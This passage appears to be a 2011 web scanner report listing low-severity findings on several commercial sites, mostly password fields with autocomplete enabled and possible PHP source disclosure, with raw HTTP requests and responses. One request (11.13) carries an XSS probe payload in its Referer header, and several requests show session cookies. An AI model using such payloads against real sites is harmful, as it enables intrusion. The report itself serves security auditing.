<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_ctl00_Head1"><
...[SNIP]...
</div>

<form name="aspnetForm" method="post" action="Default.aspx" onsubmit="javascript:return WebForm_OnSubmit();" onkeypress="javascript:return WebForm_FireDefaultButton(event, 'ctl00_ctl00_FOBasePH_ContentPH_btnLogin')" id="aspnetForm">
<div>
...[SNIP]...
<td>
            <input name="ctl00$ctl00$FOBasePH$ContentPH$txtPassword" type="password" id="ctl00_ctl00_FOBasePH_ContentPH_txtPassword" class="form-textbox" style="width:130px;" />
            &nbsp;
        </td>
...[SNIP]...

11.7. https://www.frontier.com/AgentOrdering/Login/Default.aspx

Summary

Severity:   Low
Confidence:   Certain
Host:   https://www.frontier.com
Path:   /AgentOrdering/Login/Default.aspx

Issue detail

The page contains a form with the following action URL:

The form contains the following password field with autocomplete enabled:

Request

POST /AgentOrdering/Login/Default.aspx HTTP/1.1
Host: www.frontier.com
Connection: keep-alive
Referer: https://www.frontier.com/AgentOrdering/Login/
Content-Length: 15546
Cache-Control: max-age=0
Origin: https://www.frontier.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ARPT=RNLPJJS10.160.118.20T0x0000000e_0xc7da850aCMYIL; ASP.NET_SessionId=prjxq13zplqa01qcdfmwqt45; CP=null*; s_cc=true; s_sq=cznfrontier%3D%2526pid%253DAgentOrdering%2526pidt%253D1%2526oid%253Dfunctiononclick(event)%25257Bjavascript%25253AWebForm_DoPostBackWithOptions(newWebForm_PostBackOptions(%252522ctl00%252524ct%2526oidt%253D2%2526ot%253DSUBMIT

__LASTFOCUS=&__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwUKMTQyNjYzNDI3OA9kFgJmD2QWAmYPZBYEAgkPFgIeBFRleHQFow48ZGl2IGlkPSJoZWFkZXIiPgogIDxkaXYgY2xhc3M9ImhlYWRlck5hdiI%2BCiAgICA8ZGl2IGlkPSJsZWZ
...[SNIP]...

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:27:27 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 48223


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_ctl00_Head1"><
...[SNIP]...
</div>

<form name="aspnetForm" method="post" action="Default.aspx" onsubmit="javascript:return WebForm_OnSubmit();" onkeypress="javascript:return WebForm_FireDefaultButton(event, 'ctl00_ctl00_FOBasePH_ContentPH_btnLogin')" id="aspnetForm">
<div>
...[SNIP]...
<td>
            <input name="ctl00$ctl00$FOBasePH$ContentPH$txtPassword" type="password" id="ctl00_ctl00_FOBasePH_ContentPH_txtPassword" class="form-textbox" style="width:130px;" />
            <span id="ctl00_ctl00_FOBasePH_ContentPH_reqPassword" style="color:Red;">
...[SNIP]...

11.8. https://www.frontier.com/BillPay/Login.aspx

Summary

Severity:   Low
Confidence:   Certain
Host:   https://www.frontier.com
Path:   /BillPay/Login.aspx

Issue detail

The page contains a form with the following action URL:

The form contains the following password field with autocomplete enabled:

Request

GET /BillPay/Login.aspx HTTP/1.1
Host: www.frontier.com
Connection: keep-alive
Referer: http://frontier.com/winwin1?mkwid=sPb9VHDZ0&pcrid=14742396110
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ARPT=RNLPJJS10.160.118.20T0x0000000e_0xc7da850aCMYIL; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:27:34 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 60218


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_ctl00_Head1"><
...[SNIP]...
</div>

<form name="aspnetForm" method="post" action="Login.aspx" onsubmit="javascript:return WebForm_OnSubmit();" onkeypress="javascript:return WebForm_FireDefaultButton(event, 'ctl00_ctl00_FOBasePH_ContentPH_btnLogIn')" id="aspnetForm">
<div>
...[SNIP]...
<td>
<input name="ctl00$ctl00$FOBasePH$ContentPH$txtPassword" type="password" id="ctl00_ctl00_FOBasePH_ContentPH_txtPassword" tabindex="2" onfocus="document.forms[0].onkeypress = new Function(&quot;return WebForm_FireDefaultButton(event, 'ctl00_ctl00_FOBasePH_ContentPH_btnLogIn');&quot;);" onkeydown="if (event.keyCode==13){document.getElementById('ctl00_ctl00_FOBasePH_ContentPH_btnLogIn').focus();return true;}" style="font-family:Arial;font-size:Small;font-weight:normal;" /><span id="ctl00_ctl00_FOBasePH_ContentPH_reqPassword" style="color:Red;visibility:hidden;">
...[SNIP]...

11.9. https://www.frontier.com/Shop/Login.aspx

Summary

Severity:   Low
Confidence:   Certain
Host:   https://www.frontier.com
Path:   /Shop/Login.aspx

Issue detail

The page contains a form with the following action URL:

The form contains the following password field with autocomplete enabled:

Request

GET /Shop/Login.aspx HTTP/1.1
Host: www.frontier.com
Connection: keep-alive
Referer: http://frontier.com/winwin1?mkwid=sPb9VHDZ0&pcrid=14742396110
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ARPT=RNLPJJS10.160.118.20T0x0000000e_0xc7da850aCMYIL; s_cc=true; s_sq=%5B%5BB%5D%5D; ASP.NET_SessionId=prjxq13zplqa01qcdfmwqt45

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:27:42 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 53168


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_ctl00_Head1"><
...[SNIP]...
</div>

<form name="aspnetForm" method="post" action="Login.aspx" onsubmit="javascript:return WebForm_OnSubmit();" onkeypress="javascript:return WebForm_FireDefaultButton(event, 'ctl00_ctl00_FOBasePH_ContentPH_imbSubmit')" id="aspnetForm">
<div>
...[SNIP]...
</span>
<input name="ctl00$ctl00$FOBasePH$ContentPH$txtVaPin" type="password" maxlength="4" id="ctl00_ctl00_FOBasePH_ContentPH_txtVaPin" style="font-family:Arial;font-size:Small;font-weight:normal;" />
</td>
...[SNIP]...

11.10. https://www.optionshouse.com/tool/2011.09.01.19.07/app/accountSignup/page/createLogin.jsp

Summary

Severity:   Low
Confidence:   Certain
Host:   https://www.optionshouse.com
Path:   /tool/2011.09.01.19.07/app/accountSignup/page/createLogin.jsp

Issue detail

The page contains a form with the following action URL:

The form contains the following password fields with autocomplete enabled:

Request

GET /tool/2011.09.01.19.07/app/accountSignup/page/createLogin.jsp HTTP/1.1
Host: www.optionshouse.com
Connection: keep-alive
Referer: http://landing.optionshouse.com/rate/395/yhofin/qbttn/stk_oldgb/?utm_source=yhofin&utm_medium=paid-banner-ads&utm_campaign=120x60-QuotesBttn&utm_content=stock:oldGrnBlk
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: LiveBall=uid=699982&uky=G2W1TS8H&rid=764602

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Tue, 06 Sep 2011 12:49:02 GMT
Content-Type: text/html
Connection: keep-alive
Vary: Accept-Encoding
Content-Length: 19900


<!DOCTYPE html
   PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"
...[SNIP]...
</div>

       <form data-actions="[
           {
               action: 'validator',
               triggerEvent: 'validate'
           },
           {
               action: 'removeNonVisibleFormFields',
               triggerEvent: 'handleNonVisibleFormFields',
               fieldNamesToSkip: [
                   'login.userName',
                   'login.password',
                   'login.passwordConfirm',
                   'login.securityQuestion',
                   'login.securityAnswer'
               ]
           },
           {
               action: 'createLogin',
               triggerEvent: 'loginCreate'
           },
           {
               action: 'contextualHelp'
           },
           {
               action: 'controller',
               beforeSubmitEvents: [ 'validate', 'handleNonVisibleFormFields', 'loginCreate' ],
               skipApplicationFind: true,
               skipHandleNonVisibleFormFields: true
           }
       ]">


       <fieldset class="textGroup">
...[SNIP]...
</label>
   
                       <input type="password" class="text large" id="password" name="login.password" minlength="6" maxlength="20" />
   
                       <div class="help">
...[SNIP]...
</label>
                       <input type="password" class="text large" id="passwordConfirm" name="login.passwordConfirm" minlength="6" maxlength="20" />
                        <div class="help">
...[SNIP]...

11.11. https://www.usps.com/ContentTemplates/common/scripts/login.js

Summary

Severity:   Low
Confidence:   Certain
Host:   https://www.usps.com
Path:   /ContentTemplates/common/scripts/login.js

Issue detail

The page contains a form with the following action URL:

The form contains the following password field with autocomplete enabled:

Request

GET /ContentTemplates/common/scripts/login.js HTTP/1.1
Host: www.usps.com
Connection: keep-alive
Referer: https://www.usps.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: WT_FPC=id=56.0.70.6-3690905920.30174355:lv=1315331592893:ss=1315331559860

Response

HTTP/1.1 200 OK
Server: Netscape-Enterprise/6.0
Content-Type: application/x-javascript
ETag: "585e75ef-155e-0-2242"
Last-Modified: Mon, 01 Aug 2011 20:32:56 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Length: 8770
Date: Tue, 06 Sep 2011 12:53:15 GMT
Connection: keep-alive

// Define Variables
var isUserLoggedIn = false;
var first;
   
// Get current URL
var currentPage = document.URL;

// Cookie Functions
function createCookie(name,value,days) {
   if (days) {
       v
...[SNIP]...
<div id="login-form-div">'+
           '<form id="login-form" name="loginForm" method="post" action="https://tools.usps.com/go/LoginAction.action">'+
            '<input name="successUrl" value="'+currentPage+'" id="login-form_successUrl" type="hidden">
...[SNIP]...
<span class="input-field"><input class="text" name="password" maxlength="50" id="input-password" type="password"></span>
...[SNIP]...

11.12. http://www.vonage.com/

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.vonage.com
Path:   /

Issue detail

The page contains a form with the following action URL:

The form contains the following password field with autocomplete enabled:

Request

GET /?login HTTP/1.1
Host: www.vonage.com
Proxy-Connection: keep-alive
Referer: http://www.vonage.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MP_GEOINFO="{country:'us',region:'',city:'',zipCode:'',areaCode:'',metroCode:''}"; s_cc=true; s_cpmcvp=%5B%5B%27Google-Organic-telephone%2520service%27%2C%271315327933547%27%5D%5D; s_sq=%5B%5BB%5D%5D; __utma=224263452.956306206.1315327934.1315327934.1315327934.1; __utmb=224263452.1.10.1315327934; __utmc=224263452; __utmz=224263452.1315327934.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=telephone%20service; s_vi=[CS]v1|273304B6850795C1-60000100600024FD[CE]; s_nr=1315328331917-New; gpv_pageName=index; s_cm=telephone%20serviceGooglewww.google.com

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 11:58:56 GMT
Server: Apache
X-Powered-By: PHP/5.2.8
Set-Cookie: vpc=1; expires=Fri, 03-Sep-2021 11:58:56 GMT; path=/; domain=.vonage.com
Set-Cookie: oa_event=1; path=/; domain=.vonage.com
Expires: Mon, 13 Nov 1996 05:00:00 GMT
Last-Modified: Tue, 06 Sep 2011 11:58:56 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 29750

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
   <head>
...[SNIP]...
</h2>
   <form id="logonForm" class="logonForm" target="_top" name="logonForm" method="post" action="https://secure.vonage.com/vonage-web/public/login.htm">


       <div style="font-size:11px" id="usernamebox">
...[SNIP]...
</span><input type="password" style="" name="password" id="password" value="" onfocus="resetInput(this);"/>
       </div>
...[SNIP]...

11.13. http://www.whitefence.com/404.html

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.whitefence.com
Path:   /404.html

Issue detail

The page contains a form with the following action URL:

The form contains the following password field with autocomplete enabled:

Request

GET /404.html HTTP/1.1
Host: www.whitefence.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.whitefence.com/category/high-speed-internet23bef%22%3E%3Cimg%20src%3da%20onerror%3dprompt(document.location)%3Eaffc43fb5c2/
Cookie: PHPSESSID=b5g3jlvu9jqg4vvgfhk6r1grh3

Response

HTTP/1.1 404 Not Found
Date: Tue, 06 Sep 2011 12:02:32 GMT
Server: Apache
Vary: *
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html
Content-Length: 47389

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<
...[SNIP]...
<div class="returningUser">
   <form style="display:none;" name="form1" id="returningUserForm" action="https://www.whitefence.com/WebObjects/WhiteFence.woa/wa/login" method="post" >
   <fieldset>
...[SNIP]...
</label>
           <input id="password-field" type="password" name="upwd" title="Password" value="" tabindex="998" class="input-desc password" />
       </div>
...[SNIP]...

11.14. http://www.whitefence.com/category/high-speed-internet/

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.whitefence.com
Path:   /category/high-speed-internet/

Issue detail

The page contains a form with the following action URL: https://www.whitefence.com/WebObjects/WhiteFence.woa/wa/login

The form contains the following password field with autocomplete enabled: upwd

Request

GET /category/high-speed-internet/ HTTP/1.1
Host: www.whitefence.com
Proxy-Connection: keep-alive
Referer: http://www.whitefence.com/category/television-service/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=7mgkb57jloi23h6h58j84sq2b4; _vis_opt_s=1%7C; s_cc=true; __utma=218834399.1875876376.1315327922.1315327922.1315327922.1; __utmb=218834399.1.10.1315327922; __utmc=218834399; __utmz=218834399.1315327922.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=telephone%20service; s_sq=%5B%5BB%5D%5D; _vis_opt_test_cookie=1

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 11:59:32 GMT
Server: Apache
Vary: *
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html
Content-Length: 31539

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<
...[SNIP]...
<div class="returningUser">
   <form style="display:none;" name="form1" id="returningUserForm" action="https://www.whitefence.com/WebObjects/WhiteFence.woa/wa/login" method="post" >
   <fieldset>
...[SNIP]...
</label>
           <input id="password-field" type="password" name="upwd" title="Password" value="" tabindex="998" class="input-desc password" />
       </div>
...[SNIP]...

11.15. http://www.whitefence.com/category/home-phone/

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.whitefence.com
Path:   /category/home-phone/

Issue detail

The page contains a form with the following action URL: https://www.whitefence.com/WebObjects/WhiteFence.woa/wa/login

The form contains the following password field with autocomplete enabled: upwd

Request

GET /category/home-phone/ HTTP/1.1
Host: www.whitefence.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=telephone+service
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 11:51:54 GMT
Server: Apache
Vary: *
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html
Content-Length: 29323

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<
...[SNIP]...
<div class="returningUser">
   <form style="display:none;" name="form1" id="returningUserForm" action="https://www.whitefence.com/WebObjects/WhiteFence.woa/wa/login" method="post" >
   <fieldset>
...[SNIP]...
</label>
           <input id="password-field" type="password" name="upwd" title="Password" value="" tabindex="998" class="input-desc password" />
       </div>
...[SNIP]...

11.16. http://www.whitefence.com/category/television-service/

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.whitefence.com
Path:   /category/television-service/

Issue detail

The page contains a form with the following action URL: https://www.whitefence.com/WebObjects/WhiteFence.woa/wa/login

The form contains the following password field with autocomplete enabled: upwd

Request

GET /category/television-service/ HTTP/1.1
Host: www.whitefence.com
Proxy-Connection: keep-alive
Referer: http://www.whitefence.com/category/home-phone/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=7mgkb57jloi23h6h58j84sq2b4; _vis_opt_s=1%7C; _vis_opt_test_cookie=1; s_cc=true; __utma=218834399.1875876376.1315327922.1315327922.1315327922.1; __utmb=218834399.1.10.1315327922; __utmc=218834399; __utmz=218834399.1315327922.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=telephone%20service; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 11:59:27 GMT
Server: Apache
Vary: *
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html
Content-Length: 29242

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<
...[SNIP]...
<div class="returningUser">
   <form style="display:none;" name="form1" id="returningUserForm" action="https://www.whitefence.com/WebObjects/WhiteFence.woa/wa/login" method="post" >
   <fieldset>
...[SNIP]...
</label>
           <input id="password-field" type="password" name="upwd" title="Password" value="" tabindex="998" class="input-desc password" />
       </div>
...[SNIP]...

12. Source code disclosure
There are 3 instances of this issue:

Issue background

Server-side source code may contain sensitive information which can help an attacker formulate attacks against the application.

Issue remediation

Server-side source code is normally disclosed to clients as a result of typographical errors in scripts or because of misconfiguration, such as failing to grant executable permissions to a script or directory. You should review the cause of the code disclosure and prevent it from happening.


12.1. http://frontier.my.yahoo.com/

Summary

Severity:   Low
Confidence:   Tentative
Host:   http://frontier.my.yahoo.com
Path:   /

Issue detail

The application appears to disclose some server-side source code written in PHP.

Request

GET / HTTP/1.1
Host: frontier.my.yahoo.com
Proxy-Connection: keep-alive
Referer: http://frontier.com/winwin1?mkwid=sPb9VHDZ0&pcrid=14742396110
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AO=o=1; B=ei08qcd75vc4d&b=4&d=4auM3vprYH0wsQ--&s=ii

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:29:47 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Set-Cookie: U_mtupes=YToyOntzOjE6ImIiO3M6MTM6ImVpMDhxY2Q3NXZjNGQiO3M6MjoibXQiO2k6MTMxNTMxMjE4Nzt9; expires=Fri, 06-Sep-2013 12:29:47 GMT; path=/; domain=my.yahoo.com
Expires: Thu, 01 Jan 1995 22:00:00 GMT
Last-Modified: Tue, 06 Sep 2011 12:29:47 GMT
Cache-Control: private, no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: MYFMP_Sacfea3=d=7142216504e66123b932767.54181906&s=6JRSdtjl3lb3w.8KyXWmOA--; expires=Mon, 05-Sep-2011 12:29:47 GMT; path=/; domain=frontier.my.yahoo.com; httponly
Set-Cookie: MYTMI=4; expires=Wed, 05-Sep-2012 12:29:47 GMT; path=/; domain=my.yahoo.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 171806

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html class="ua-wk ua-win">
<head>
<script>var gTop = Number(new Date());</script> <script> </s
...[SNIP]...
<a class="charticonlink charticon_normal" href="javascript:void(0)" id="yfi_ms_chart_^DJI"><?javax.xml.transform.disable-output-escaping ?>&nbsp; &nbsp;<?javax.xml.transform.disable-output-escaping ?></a>
...[SNIP]...
<a href="http://finance.yahoo.com/q?s=^DJI"><?javax.xml.transform.disable-output-escaping ?>Dow<?javax.xml.transform.disable-output-escaping ?></a>
...[SNIP]...
<a class="charticonlink charticon_normal" href="javascript:void(0)" id="yfi_ms_chart_^IXIC"><?javax.xml.transform.disable-output-escaping ?>&nbsp; &nbsp;<?javax.xml.transform.disable-output-escaping ?></a>
...[SNIP]...
<a href="http://finance.yahoo.com/q?s=^IXIC"><?javax.xml.transform.disable-output-escaping ?>Nasdaq<?javax.xml.transform.disable-output-escaping ?></a>
...[SNIP]...
<a class="charticonlink charticon_normal" href="javascript:void(0)" id="yfi_ms_chart_^GSPC"><?javax.xml.transform.disable-output-escaping ?>&nbsp; &nbsp;<?javax.xml.transform.disable-output-escaping ?></a>
...[SNIP]...
<a href="http://finance.yahoo.com/q?s=^GSPC"><?javax.xml.transform.disable-output-escaping ?>S&P 500<?javax.xml.transform.disable-output-escaping ?></a>
...[SNIP]...
<p><?javax.xml.transform.disable-output-escaping ?>

<p>
...[SNIP]...
</b> Stocks had logged back-to-back losses before they entered the holiday weekend, but the break has done anything to cool selling interest. Premarket participants are applying sh<?javax.xml.transform.disable-output-escaping ?>
...
       
<a href="http://finance.yahoo.com/marketupdate/overview">
more
<?javax.xml.transform.disable-output-escaping ?>&raquo;<?javax.xml.transform.disable-output-escaping ?></a>
...[SNIP]...

12.2. http://www.aptela.com/my-account/

Summary

Severity:   Low
Confidence:   Tentative
Host:   http://www.aptela.com
Path:   /my-account/

Issue detail

The application appears to disclose some server-side source code written in PHP.

Request

GET /my-account/ HTTP/1.1
Host: www.aptela.com
Proxy-Connection: keep-alive
Referer: http://www.aptela.com/misc/privacy-policy/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmx=207344579.; __utmxx=207344579.; exp_last_visit=999966382; exp_last_activity=1315326382; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A21%3A%22%2Fmisc%2Fprivacy-policy%2F%22%3B%7D; jkid=None; tsa1v784=uvid54f3722f72cf13ba4e964afc25de508921958; tsa1s784=usid54f3722f72cf13ba4e964afc25de508921958; WRUID=1480628145.1067928662; _mkto_trk=id:533-RGZ-601&token:_mch-aptela.com-1315327921949-36615; __utma=207344579.967367889.1315327921.1315327921.1315329987.2; __utmb=207344579.2.10.1315329987; __utmc=207344579; __utmz=207344579.1315329987.2.2.utmcsr=google|utmgclid=CMqnsqPHiKsCFRM2gwodbCP53A|utmccn=phones_business|utmcmd=ppc|utmctr=business_telephone_service

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:26:28 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: exp_last_activity=1315326388; expires=Wed, 05-Sep-2012 12:26:28 GMT; path=/
Set-Cookie: exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A12%3A%22%2Fmy-account%2F%22%3Bi%3A1%3Bs%3A21%3A%22%2Fmisc%2Fprivacy-policy%2F%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Tue, 06 Sep 2011 12:26:29 GMT
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 12258
Connection: close
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head>


<title> My Account
...[SNIP]...
<div id="sidebar">

           <?php
$pageTitle = '{embed:pageTitle}';
$sectionTitle = '{embed:sectionTitle}';
$subsectionTitle = '{embed:subsectionTitle}';
?>


<ul id="subnav">
...[SNIP]...

12.3. http://www.aptela.com/my-account/login-error/

Summary

Severity:   Low
Confidence:   Tentative
Host:   http://www.aptela.com
Path:   /my-account/login-error/

Issue detail

The application appears to disclose some server-side source code written in PHP.

Request

GET /my-account/login-error/ HTTP/1.1
Host: www.aptela.com
Proxy-Connection: keep-alive
Referer: http://www.aptela.com/my-account/
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
